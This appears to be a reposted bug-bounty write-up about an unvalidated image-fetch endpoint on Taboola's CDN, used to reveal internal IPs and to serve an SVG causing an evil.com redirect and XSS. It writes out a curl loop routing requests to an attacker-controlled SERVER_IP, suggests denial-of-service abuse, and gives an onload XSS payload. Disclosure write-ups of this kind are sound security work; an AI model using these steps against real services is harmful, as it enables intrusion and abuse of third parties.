A juicy endpoint on the Taboola leads to reveal internal IPs and XSS

~ Dade Murphy

InfoSec Write-ups – Medium–

I usually read news about security everyday, One of these websites is ZDNet. There is an space in the bottom of page for recommending ads by the Taboola.

As a security enthusiastic, I always take a look at somewhere I can 😁

Just right-click on ads’s picture and find a juicy endpoint by Inspect Element. An endpoint fetch pictures from the Taboola CDN.

https://images.taboola.com/taboola/image/fetch/

If you insert an external URL image after this endpoint, the Taboola server process and show the picture. The Taboola doesn’t check that image is from it’s CDN or not!

I thought that what happened, If I sent a request from Taboola by this endpoint to my server, So I did it and found the Taboola internal IPs.

Prepare my server by the following command for listening on port 8000

python -m SimpleHTTPServer 8000

and from my PC send multiple requests to server by the following code:

for number in {1..100}
do curl -i https://images.taboola.com/taboola/image/fetch/http://SERVER_IP:8000/$number
done

and responses were amazing!!!

The Taboola use Fastly CDN and whenever you ping images.taboola.com you should receive the following response:

ping images.taboola.com
PING tls13.taboola.map.fastly.net (151.101.193.44) 56(84) bytes of data.

But I found internal IPs from Amazon!!!

So, With this juicy endpoint you can run DOS Attack behalf the Taboola servers.

In addition, these servers had open ports on 22 and 80 and on one of them had two CVEs.

Maybe you’ve thought that, this endpoint process images and maybe accept SVG images 😉

Find an SVG image and open it by an text editor. Add the following code and upload it on the Internet.

Finally, we have this link:

https://images.taboola.com/taboola/image/fetch/https://www.linkpicture.com/q/dog.svg

Unfortunately, the endpoint doesn’t process SVG images properly and browser will download file but if you use Chrome or IE and click on downloaded image for opening image you will redirect to evil.com

You can change payload in SVG file to the following code for executing XSS:

onload='alert("XSS")'

https://medium.com/media/fb1379d8ed4fa65edb1a3747e4b4a848/href

I’ve found these bugs on the Taboola and sent email to support team on March 2020. They didn’t respond to me until now!

A juicy endpoint on the Taboola leads to reveal internal IPs and XSS was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

View original article on InfoSec Write-ups – Medium

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s